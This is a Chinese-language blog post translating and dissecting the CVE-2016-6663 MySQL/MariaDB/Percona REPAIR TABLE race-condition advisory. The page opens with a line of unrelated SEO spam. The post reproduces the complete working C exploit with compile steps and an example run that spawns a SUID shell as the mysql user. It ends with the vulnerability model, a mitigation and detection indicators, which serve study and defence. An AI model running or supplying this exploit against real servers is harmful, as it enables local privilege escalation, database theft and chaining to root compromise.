vultr怎么做网站,北京网站建设软件,郑州中森网站建设,seo按照搜索引擎的什么对网站date: 2016/11/3author: dlive0x01 漏洞原文翻译水平不高求轻喷感觉作者在写文章的时候有些地方描述的也不是特别清楚#xff0c;不过结合poc可以清晰理解漏洞利用过程0x04漏洞利用过程总结给出了清晰的漏洞利用过程#xff0c;结合poc食用效果更佳# http://legalhackers.com…date: 2016/11/3author: dlive0x01 漏洞原文翻译水平不高求轻喷感觉作者在写文章的时候有些地方描述的也不是特别清楚不过结合poc可以清晰理解漏洞利用过程0x04漏洞利用过程总结给出了清晰的漏洞利用过程结合poc食用效果更佳# http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html- Release date: 01.11.2016- Discovered by: Dawid Golunski- Severity: Critical- CVE-2016-6663 / OCVE-2016-5616- http://legalhackers.comI. VULNERABILITY-------------------------MySQL / MariaDB / PerconaDB - Privilege Escalation / Race ConditionMariaDB 5.5.52 10.1.18 10.0.28MySQL 5.5.51 5.6.32 5.7.14Percona Server 5.5.51-38.2 5.6.32-78-1 5.7.14-8Percona XtraDB Cluster 5.6.32-25.17 5.7.14-26.17 5.5.41-37.0III. INTRODUCTION-------------------------An independent research has revealed a race condition vulnerability which ispresent in MySQl, MariaDB and PerconaDB databases.一个独立研究者在MySQLMariaDB, PerconaDB上发现一个竞态条件漏洞The vulnerability can allow a local system user with access to the affecteddatabase in the context of a low-privileged account (CREATE/INSERT/SELECT grants)to escalate their privileges and execute arbitrary code as the database systemuser (typically mysql).假设本地系统用户test_user具有访问数据库的一个低权限权限用户test_db_user并且该用户具有数据库的create/insert/select权限。该漏洞可以将test_user权限提升为数据库系统用户权限(一般为mysql用户)Successful exploitation would allow an attacker to gain access to all of thedatabases stored on the affected database server.成功攻击后攻击者可以获取访问所有数据库文件的权限The obtained level of access upon the exploitation, could be chained withthe other privilege escalation vulnerabilities discovered by the author ofthis advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privilegesfrom mysql user to root user and thus allow attackers to fully compromise thetarget server.通过该漏洞获取权限后可结合其他本地提权漏洞(如该漏洞作者发现的CVE-2016-6662 and CVE-2016-6664)进行更高的权限提升(从mysql到root),这会导致攻击者进一步对服务器造成危害IV. DESCRIPTION-------------------------Table locations​~~~~~~~~~~~~~~~~~~MySQL-based databases allow users with CREATE table privilege to optionallyspecify a disk path of the directory where the table will be stored via a DATADIRECTORY parameter in the CREATE statement.基于MySQL的数据库允许拥有Create权限的用户指定create table时table文件在磁盘上的存储路径(通过create语句的DATA DIRECTORY参数可以指定该路径)Users who have access to a database account with CREATE grant could create atable under a directory that they can control. For example:拥有create权限的用户可以在他们有权限的目录下创建一个table例:attackerdebian:~$ mkdir /tmp/disktableattackerdebian:~$ chmod 777 /tmp/disktable/attackerdebian:~$ ls -ld /tmp/disktable/drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/A user could then place a table within the directory with the following SQLstatement:该用户可以通过SQL语句在该目录下创建table:mysql CREATE TABLE poctab1 (txt varchar(50)) engine MyISAM data directory /tmp/disktable;which would result in creating the following table file:以上操作会创建如下table文件:attackerdebian:~$ ls -l /tmp/disktable/total 0-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYDRace Condition​~~~~~~~~~~~~~~~~~~Observing file operations performed on the table stored within the directory,it was discovered that REPAIR TABLE SQL statement which is available tolow-privileged users with SELECT/CREATE/INSERT grants, performed unsafeoperations on temporary files created during the table repair process.观察table被存储在指定路径时的文件操作当运行table修复进程时REPAIR TABLE的SQL语句存在一个对临时文件的不安全的文件操作而且拥有select/create/insert权限的低权限用户可以执行REPAIR TABLE的SQL语句。Executing the statement:执行以下SQL语句mysql REPAIR TABLE poctab1;--------------------------------------------| Table | Op | Msg_type | Msg_text |--------------------------------------------| testdb.poctab1 | repair | status | OK |--------------------------------------------would result in execution of the following system calls:这条REPAIR TABLE语句会导致如下系统调用被执行[pid 1463] lstat(/tmp/disktable/poctab1.MYD, {st_modeS_IFREG|0660, st_size0, ...}) 0[pid 1463] open(/tmp/disktable/poctab1.MYD, O_RDWR) 65[pid 1463] access(./testdb/poctab1.TRG, F_OK) -1 ENOENT (No such file or directory)[pid 1463] lseek(65, 0, SEEK_CUR) 0[pid 1463] lseek(65, 0, SEEK_END) 0[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) 0[pid 1463] open(/tmp/disktable/poctab1.TMD, O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) 66[pid 1463] lseek(65, 0, SEEK_END) 0[pid 1463] lseek(64, 0, SEEK_END) 1024[pid 1463] close(65) 0[pid 1463] close(66) 0[pid 1463] lstat(/tmp, {st_modeS_IFDIR|S_ISVTX|0777, st_size4096, ...}) 0[pid 1463] lstat(/tmp/disktable, {st_modeS_IFDIR|0777, st_size4096, ...}) 0[pid 1463] lstat(/tmp/disktable/poctab1.MYD, {st_modeS_IFREG|0660, st_size0, ...}) 0[pid 1463] stat(/tmp/disktable/poctab1.MYD, {st_modeS_IFREG|0660, st_size0, ...}) 0[pid 1463] chmod(/tmp/disktable/poctab1.TMD, 0660) 0[pid 1463] chown(/tmp/disktable/poctab1.TMD, 110, 115) 0[pid 1463] unlink(/tmp/disktable/poctab1.MYD) 0[pid 1463] rename(/tmp/disktable/poctab1.TMD, /tmp/disktable/poctab1.MYD) 0The first call:[pid 1463] lstat(/tmp/disktable/poctab1.MYD, {st_modeS_IFREG|0660, st_size0, ...}) 0was found to check file permissions of poctab1.MYD table which are then copied with chmod()to the newly created poctab1.TMD temporary file containing the repaired table.第一系统调用会检查poctab1.MYD的权限之后会通过chmod()将其权限复制到新创建的名为poctab1.TMD的临时文件这个临时文件中存贮着被修复的table.The code is vulnerable to Race Condition between the call:以下两个操作间存在竞态条件漏洞[pid 1463] lstat(/tmp/disktable/poctab1.MYD, {st_modeS_IFREG|0660, st_size0, ...}) 0and[pid 1463] chmod(/tmp/disktable/poctab1.TMD, 0660) 0If an attacker managed to unlink the temporary table poctab1.TMD and replace itwith a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race),they would be able to apply arbitrary permissions on the data directory.The attacker would be able to control the set of permissions by pre-setting them onpoctab1.MYD file before executing the REPAIR TABLE statement.For example, by setting the permissions of poctab1.MYD to 777 the data directorywould become readable and writable to the attacker.如果攻击者在chmod()操作前删除(即赢得竞争)poctab1.TMD并将其替换为一个指向/var/lib/mysql的符号链接攻击者可以给该路径赋予任何权限。攻击者可以在REPAIR TABLE语句执行前通过预设某个权限给poctab1.MYD文件来控制/var/lib/mysql的权限。例如给poctab1.MYD设置777的权限mysql的数据目录(/var/lib/mysql)就会被设置为777权限这时攻击者就可以对该目录进行读写。(现在可以给/var/lib/mysql设置任意权限)Obtaining mysql-suid shell​~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Apart from gaining access to arbitrary mysql files, the attacker could alsoachieve arbitrary code execution in the context of mysql user (mysql shell).除了获取访问任意mysql文件的权限攻击者还可以mysql用户执行任意代码This could be done by first pre-setting permissions on poctab1.MYD to 04777(suid), and winning the race so that the permissions get applied on a copyof a bash shell file through the vulnerable chmod() call effectively creatinga shell that elevates their permissions after execution.首先要设置poctab1.MYD的权限为04777(suid)之后复制一个bash shell文件覆盖poctab1.MYD, 然后赢得竞争这时chmod()会将04777的权限赋予bash shellThere is only one problem. Their suid shell would remain to be owned by theattackers user id and not mysql user.要成功利用漏洞还有一个问题需要解决suid shell将只会保留攻击者的UID而不是mysql用户。To elevate their privileges, attacker would need to copy the bash shell to amysql-owned table file which are owned by mysql user. However mysql tablefiles are not writable by other users making it impossible for attacker to savethe shell.为了提升权限攻击者需要拷贝bash shell到mysql用户拥有的table文件但是other用户没有对表文件的写权限。This could be bypassed if attacker created a specially crafted directorywith a group sticky bit and then created a second table named poctab2 asfollows:攻击者可以精心构造一个sgid的目录绕过以上限制然后创建第二个表文件名为poctab2,如下attackerdebian:/tmp/disktable$ chmod gs /tmp/disktable/attackerdebian:/tmp/disktable$ ls -ld /tmp/disktable/drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/mysql CREATE TABLE poctab2 (txt varchar(50)) engine MyISAM data directory /tmp/disktable;Query OK, 0 rows affected (0.00 sec)attackerdebian:/tmp/disktable$ ls -l /tmp/disktable/total 0-rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYDAs we can see poctab2.MYD table (thanks to the sticky bit (s) on the permissionsof the group on disktable directory) has mysql as the owner but attackeras the group.我们可以看到poctab2.MYD的owner为mysql但是group是attackerTherefore, the attacker would now be able to copy /bin/bash to poctab2.MYD fileand preserve the file owner.因此攻击者现在可以用/bin/bash覆盖poctab2.MYD文件并且可以保存文件的owner为mysqlFinally, they could exploit the Race Condition again and have SUID execpermissions applied on poctab2.MYD which would then allow them to execute the suidshell with elevated privileges of the mysql user.最后攻击者可以赢得竞争并获得suid执行权限的poctab2.MYD攻击者最终可以获得一个mysql user的shellFrom mysql to root​~~~~~~~~~~~~~~~~~~~~~~~~After obtaining a mysql suid shell, attackers could then exploit one of theother MySQL vulnerabilities discovered by the author of this advisory:CVE-2016-6662orCVE-2016-6664 (OCVE-2016-5617)to escalate their privileges from mysql user to root system user.获得mysql shell之后攻击者可以继续利用其他漏洞如CVE-2016-6662或者CVE-2016-6664提升权限到rootV. PROOF OF CONCEPT EXPLOIT-------------------------------------------[ mysql-privesc-race.c ]--------------------见0x03漏洞利用代码分析------------------[ EOF ]--------------------Example run:​~~~~~~~~~~~~~~attackerxenial:~/mysql-exploit$ lsb_release -aNo LSB modules are available.Distributor ID:UbuntuDescription:Ubuntu 16.04.1 LTSRelease:16.04Codename:xenialattackerxenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-servii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version)ii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binariesii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server filesattackerxenial:~/mysql-exploit$ iduid1001(attacker) gid1001(attacker) groups1001(attacker)attackerxenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e show grants;-----------------------------------------------------------------------------------------------------------------| Grants for attackerlocalhost |-----------------------------------------------------------------------------------------------------------------| GRANT USAGE ON *.* TO attackerlocalhost IDENTIFIED BY PASSWORD *3CC3900C7B2B0A885AB128894FC10949340A09CC || GRANT SELECT, INSERT, CREATE, DROP ON pocdb.* TO attackerlocalhost |-----------------------------------------------------------------------------------------------------------------attackerxenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.*ls: cannot access /var/lib/mysql/mysql/user.*: Permission deniedattackerxenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdbMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploitmysql-privesc-race.c (ver. 1.0)CVE-2016-6663 / OCVE-2016-5616For testing purposes only. Do no harm.Discovered/Coded by:Dawid Golunskihttp://legalhackers.com[] Starting the exploit as:uid1001(attacker) gid1001(attacker) groups1001(attacker)[] Connecting to the database pocdb as attackerlocalhost[] Creating exploit temp directory /tmp/mysql_privesc_exploit[] Creating mysql tablesDROP TABLE IF EXISTS exploit_tableDROP TABLE IF EXISTS mysql_suid_shellCREATE TABLE exploit_table (txt varchar(50)) engine MyISAM data directory /tmp/mysql_privesc_exploitCREATE TABLE mysql_suid_shell (txt varchar(50)) engine MyISAM data directory /tmp/mysql_privesc_exploit[] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits :-rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD[] Entering the race loop... Hang in there...[] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell:-rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD[] Spawning the mysql SUID shell now...Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)mysql_suid_shell.MYD-4.3$ whoamimysqlmysql_suid_shell.MYD-4.3$ iduid1001(attacker) gid1001(attacker) euid107(mysql) groups1001(attacker)mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm-rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYImysql_suid_shell.MYD-4.3$ exitexit[] Job done. Exitingreal0m28.999suser0m0.016ssys0m0.016sVI. BUSINESS IMPACT-------------------------Malicious local users with DB access granted a common set of privileges(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrarycode and escalate their privileges to mysql system user. This would allow themto gain access to all of the databases stored on the server as well as exploitCVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privilegesto root system user (rootshell) and fully compromise the target server.拥有select/insert/create权限的恶意本地用户可以利用这个漏洞执行任意代码并且可以提升权限到mysql系统用户。这会使他们有权限访问服务器上的所有的数据库文件结合CVE-2016-6662或者CVE-2016-6664可以进一步提升权限到root用户。This vulnerability could for example be exploited by malicious users in a sharedhosting environment where each user is supposed to have access to only onedatabase assigned to them.例如这个漏洞可以被共享环境(每个用户都被分配了一个可以访问的数据库)下的恶意用户利用。It could also be exploited by attackers who have managed to find a vulnerabilityin a website and gained access to the target system as a low-privileged user(such as apache/www-data).这个漏洞还可以被通过web入侵的已经获得了低权限用户(如apache/www-data用户)的攻击者利用VIII. SOLUTION-------------------------Update to security releases issued by the vendor.更新补丁。As a temporary mitigation, you can disable symbolic link support in thedatabase server configuration with the following my.cnf config setting:作为临时缓解措施,您可以在数据库配置文件my.cnf中禁用符号链接的支持symbolic-links 0Nevertheless, an update to a patched release is recommended.更好的解决方法是补丁更新后建议为服务器打上最新补丁。0x02 漏洞验证系统: Debian 4.0.4-1 kali2 x86_64MySQL版本: 5.5.47低权限系统用户: attacker(新建的用户,低权限用户)数据库: test_6663 用户: test_6663 密码: 6663数据库权限create/insert/select/drop编译exp:如果编译失败可能是缺少mysql库使用sudo apt-get install libmysqld-dev安装#若需指定mysqlclient动态链接库路径可加上-L参数如-L/usr/lib64/mysqlgcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient运行exp效果:可以看到提权后的用户是mysql可以读取mysql的数据文件如图读到root密码为空test_6663的mysql加密的密码攻击成功后如果想再次获得mysql系统用户权限的shell不用再次进行攻击只需运行mysql_suid_shell.MYD文件即可但这个地方有个坑直接运行该文件发现不会获得mysql权限运行时需要加上-p参数即./mysql_suid_shell.MYD -p -i(详细原因参加0x05漏洞/利用模型抽象 - 2.权限提升tips - 3.使用SUID)0x03 漏洞利用代码分析感觉作者在写文章的时候有些地方描述的也不是特别清楚不过结合poc可以清晰理解漏洞利用过程/*MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploitmysql-privesc-race.c (ver. 1.0)CVE-2016-6663 / OCVE-2016-5616Discovered/Coded by:Dawid Golunskidawid[at]legalhackers.comdawid_golunskihttp://legalhackers.comCompile:gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclientNote:* On RedHat-based systems you might need to change /tmp to another public directory在基于redhat的系统上你可能需要将/tmp目录改为其他的目录如/uploads* For testing purposes only. Do no harm.Full advisory URL:http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html*/#include #include #include #include #include #include #include #include #include #include #include #include #include #include #define EXP_PATH /tmp/mysql_privesc_exploit#define EXP_DIRN mysql_privesc_exploit#define MYSQL_TAB_FILE EXP_PATH /exploit_table.MYD#define MYSQL_TEMP_FILE EXP_PATH /exploit_table.TMD#define SUID_SHELL EXP_PATH /mysql_suid_shell.MYD#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessaryMYSQL *conn; // DB handlesMYSQL_RES *res;MYSQL_ROW row;unsigned long cnt;void intro() {printf(\033[94m\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\nmysql-privesc-race.c (ver. 1.0)\n\nCVE-2016-6663 / OCVE-2016-5616\n\nFor testing purposes only. Do no harm.\n\nDiscovered/Coded by:\n\nDawid Golunski \nhttp://legalhackers.com\033[0m\n\n);}void usage(char *argv0) {intro();printf(Usage:\n\n%s user pass db_host database\n\n, argv0);}void mysql_cmd(char *sql_cmd, int silent) {if (!silent) {printf(%s \n, sql_cmd);}if (mysql_query(conn, sql_cmd)) {fprintf(stderr, %s\n, mysql_error(conn));exit(1);}res mysql_store_result(conn);if (res0) mysql_free_result(res);}int main(int argc,char **argv){int randomnum 0;int io_notified 0;int myd_handle;int wpid;int is_shell_suid0;pid_t pid;int status;struct stat st;/* io notify */int fd;int ret;char buf[4096] __attribute__((aligned(8)));int num_read;struct inotify_event *event;/* credentials */char *user argv[1];char *password argv[2];char *db_host argv[3];char *database argv[4];// Disable buffering of stdoutsetvbuf(stdout, NULL, _IONBF, 0);// Get the paramsif (argc!5) {usage(argv[0]);exit(1);}intro();// Show initial privilegesprintf(\n[] Starting the exploit as: \n);system(id);// Connect to the database server with provided credentials// 连接数据库printf(\n[] Connecting to the database %s as %s%s\n, database, user, db_host);conn mysql_init(NULL);if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {fprintf(stderr, %s\n, mysql_error(conn));exit(1);}// Prepare tmp dir// 新建目录/tmp/mysql_privesc_exploit并未该目录设置SGIDprintf(\n[] Creating exploit temp directory %s\n, /tmp/ EXP_DIRN);umask(000);system(rm -rf /tmp/ EXP_DIRN mkdir /tmp/ EXP_DIRN);system(chmod gs /tmp/ EXP_DIRN );// Prepare exploit tables :)// 新建两个表exploit_table和mysql_suid_shellprintf(\n[] Creating mysql tables \n\n);mysql_cmd(DROP TABLE IF EXISTS exploit_table, 0);mysql_cmd(DROP TABLE IF EXISTS mysql_suid_shell, 0);mysql_cmd(CREATE TABLE exploit_table (txt varchar(50)) engine MyISAM data directory EXP_PATH , 0);mysql_cmd(CREATE TABLE mysql_suid_shell (txt varchar(50)) engine MyISAM data directory EXP_PATH , 0);// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file// The file should be owned by mysql:attacker thanks to the sticky bit on the table directory// 拷贝/bin/bash到mysql_suid_shell.MYDprintf(\n[] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n);system(cp /bin/bash SUID_SHELL);system(ls -l SUID_SHELL);// Use inotify to get the timing rightfd inotify_init();if (fd 0) {printf(failed to inotify_init\n);return -1;}ret inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUIDexec perms */printf(\n[] Entering the race loop... Hang in there...\n);// 判断mysql_suid_shell.MYD是否被设置了suidwhile ( is_shell_suid ! 1 ) {cnt;if ( (cnt % 100) 0 ) {printf(-);//fflush(stdout);}/* Create empty file , remove if already exists */// 删除exploit_table.TMDunlink(MYSQL_TEMP_FILE);// 删除exploit_table.MYDunlink(MYSQL_TAB_FILE);mysql_cmd(DROP TABLE IF EXISTS exploit_table, 1);mysql_cmd(CREATE TABLE exploit_table (txt varchar(50)) engine MyISAM data directory EXP_PATH , 1);/* random num if needed */srand ( time(NULL) );randomnum ( rand() % MAX_DELAY );// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink// 替换exploit_table.tmd为符号链接pid fork();if (pid 0) {fprintf(stderr, Fork failed :(\n);}/* Child process - executes REPAIR TABLE SQL statement */// 子进程执行REPAIR操作, 该操作会生成一个TMD文件if (pid 0) {usleep(500);unlink(MYSQL_TEMP_FILE);mysql_cmd(REPAIR TABLE exploit_table EXTENDED, 1);// child stops hereexit(0);}// 父进程将exploit_table.tmd替换为符号链接/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */if (pid 0 ) {io_notified 0;while (1) {int processed 0;ret read(fd, buf, sizeof(buf));if (ret 0) {break;}while (processed ret) {event (struct inotify_event *)(buf processed);if (event-mask IN_CLOSE) {if (!strcmp(event-name, exploit_table.TMD)) {//usleep(randomnum);// Set the .MYD permissions to suidexec before they get copied to the .TMD file// 将MYD的权限设置为04777(suidexec)// 删除mysql建立的exploit_table.MYDunlink(MYSQL_TAB_FILE);// 以attacker身份新建exploit_table.MYDmyd_handle open(MYSQL_TAB_FILE, O_CREAT, 0777);close(myd_handle);// 将MYD权限改为04777chmod(MYSQL_TAB_FILE, 04777);// 将exploit_table.TMD换为符号链接指向mysql_suid_shell.TMD// Replace the temp .TMD file with a symlink to the target sh binary to get suidexecunlink(MYSQL_TEMP_FILE);symlink(SUID_SHELL, MYSQL_TEMP_FILE);io_notified1;}}processed sizeof(struct inotify_event);}if (io_notified) {break;}}waitpid(pid, status, 0);}// Check if SUID bit was set at the end of this attemptif ( lstat(SUID_SHELL, st) 0 ) {if (st.st_mode S_ISUID) {is_shell_suid 1;}}}printf(\n\n[] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n, cnt);system(ls -l SUID_SHELL);printf(\n[] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n);//启动bash shell,因为设置了SUID所以会获得mysql权限system(SUID_SHELL -p -i );//system(SUID_SHELL -p -c /bin/bash -i -p);/* close MySQL connection and exit */printf(\n[] Job done. Exiting\n\n);mysql_close(conn);return 0;}0x04 漏洞利用过程总结两个重要过程MySQL创建表指定路径(虽然和漏洞利用没太大关系但还是提一下XD)MySQL指定create table的路径时会将数据库MYD文件存放在指定路径并且会在/var/lib/mysql/database_name/下建立符号链接MySQL REPAIR过程strace -p pid_of_mysql -f -o output_file修复过程中原MYD文件会被删除TMD文件会被重命名为新的MYD文件漏洞存在于lstat和chmod之间(见0x01漏洞原文和0x05 1.竞态条件漏洞模型)以漏洞利用中操作的数据库表的不同进行分类整个漏洞利用过程可分为两块:对mysql_suid_shell表的操作新建mysql_suid_shell表并将MYD文件指定存储到设置sgid的文件夹/tmp/mysql_privesc_exploit中使得mysql_suid_shell.MYD的属性变为mysql的owner和attacker的group(原理见0x05)从而attacker可以拷贝/bin/bash到/tmp/mysql_privesc_exploit/mysql_suid_shell.MYD并且文件的owner为mysql对exploit_table表的操作新建exploit_table表并将MYD文件指定存储到/tmp/mysql_privesc_exploit中删除mysql建立的MYD以attacker身份新建MYD, 然后Repair exploit_table, 在repair的过程中会生成TMD文件通过赢得竞争将TMD文件设置为指向mysql_suid_shell.MYD的符号链接因为TMD的权限与MYD相同MYD的权限可由attacker控制从而实现修改mysql_suid_shell.MYD的权限为04777(set-uidexec)然后启动mysql_suid_shell.MYD即可攻击成功后/tmp/mysql_privesc_exploit下文件的状态:rootdlive:/tmp/mysql_privesc_exploit# ls -la总用量 1016drwxrwsrwx 2 attacker attacker 4096 11月 9 19:15 .drwxrwxrwt 18 root root 4096 11月 9 19:12 ..-rwsrwxrwx 1 attacker attacker 0 11月 9 19:15 exploit_table.MYDlrwxrwxrwx 1 attacker attacker 47 11月 9 19:15 exploit_table.TMD - /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD-rwsrwxrwx 1 mysql attacker 1029624 11月 9 19:12 mysql_suid_shell.MYD0x05 漏洞/利用模型抽象根据漏洞原理我们可以抽象出一个简化的漏洞模型漏洞模型的抽象有利于对漏洞的理解和知识体系的形成。这个CVE-2016-6663可以被抽象为两个漏洞模型(比较简单):1.竞态条件漏洞模型在此漏洞中首先对MYD文件进行了lstat()操作获取其权限信息然后对TMD文件进行chmod()操作将获取的权限信息赋予TMD若lstat后将TMD文件换为符号链接连接到攻击者可控文件攻击者即可进行权限提升。详细竞态条件漏洞demo可以参考SEEDLabs的实验:2.权限提升tips使用符号链接ln -s file1 file2 #创建符号链接file2指向file1对符号链接chmod的效果是目标文件的权限会被改变有的时候符号链接还可以用来绕过目录访问限制使用SGID如果对目录设置SGID那么会有如下效果若使用者在此目录下具有w的权限(可以新建文件)则使用者所创建的新文件该新文件的group与此目录的group相同。使用SUID设置SUID的mysql_suid_shell.MYD会以其owner权限运行但是这有个坑就是bash对suid有保护运行mysql_suid_shell.MYD时需要加上-p选项才能真正让SUID生效(参加:http://unix.stackexchange.com/questions/116792/privileged-mode-in-bash)#bash man page-pTurn on privileged mode. In this mode, the $BASH_ENV and$ENV files are not processed, shell functions are notinherited from the environment, and the SHELLOPTS,BASHOPTS, CDPATH and GLOBIGNORE variables, if theyappear in the environment, are ignored. If the shell isstarted with the effective user (group) id not equal to thereal user (group) id, and the -p option is not supplied,these actions are taken and the effective user id is set tothe real user id. If the -p option is supplied at startup,the effective user id is not reset. Turning this option offcauses the effective user and group ids to be set to the realuser and group ids.0x06 应急响应该漏洞的暂时修补方案为在my.conf中禁用符号链接symbolic-links 0攻击检测CVE-2016-6663作者提供的exp默认在提权成功后未删除表和表文件所以我们可以简单从一下几点判断是否服务器是否被此漏洞攻击mysql --vesion 判断版本信息/tmp/mysql_privesc_exploit 文件夹是否存在以及文件夹下是否存在exploit_table.MYD, exploit_table.TMD, mysql_suid_shell.MYD等文件/var/lib/mysql/下面某数据库目录下是否存在exploit_table.MYD或mysql_suid_shell.MYD的符号链接mysql数据库中是否存在exploit_table或mysql_suid_shell表0x07 参考资料